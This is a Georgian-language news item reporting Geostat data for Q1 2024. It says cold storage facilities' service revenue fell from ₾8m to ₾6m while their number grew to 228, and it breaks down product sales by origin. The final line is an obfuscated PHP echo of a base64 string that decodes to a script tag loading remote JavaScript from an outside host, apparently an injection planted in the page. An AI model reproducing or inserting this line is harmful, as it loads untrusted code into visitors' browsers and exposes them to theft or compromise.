celsiusi
ავერსი საქკაბელი

 სამაცივრე მეურნეობების შემოსავალი 2 მლნ ლარით შემცირდა. საქსტატის მონაცემებით, მიმდინარე წლის პირველ კვარტალში სამაცივრე მეურნეობებმა მომსახურებით ₾6 მლნ-ის შემოსავალი მიიღეს, მაშინ როცა გასული წლის ანალოგიურ პერიოდში მიღებულმა შემოსავალმა ₾8 მლნ შეადგინა. რაც შეეხება სამაცივრე მეურნეობების რაოდენობას, მიმდინარე წლის იანვარ-მარტში მათი რაოდენობა გაიზარდა და 228 შეადგინა, გასული წლის პირველ კვარტალში კი 210 იყო.

ამასთან, საქსტატის მონაცემებით, 2024 წლის I კვარტალში სამაცივრე მეურნეობების მიერ გაყიდულია 125.6 მლნ ლარის ღირებულების (27.1 ათასი ტონა) პროდუქცია, საიდანაც, ღირებულებით გამოსახულებაში, იმპორტირებულმა პროდუქციამ 23.6% შეადგინა, საკუთარი წარმოების პროდუქციამ - 23.4%, ხოლო შესყიდულმა (ადგილობრივი) პროდუქციამ - 53%.

გასული წლის პირველ კვარტალში კი მეურნეობებიდან გაყიდული პროდუქციის ღირებულება 107.5 მლნ ლარი იყო (21.5 ათასი ტონა). იმპორტირებულმა პროდუქციამ 23.6% შეადგინა, საკუთარი წარმოების პროდუქციამ - 35.9%, ხოლო შესყიდულმა (ადგილობრივი) პროდუქციამ - 40.5%.

160
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");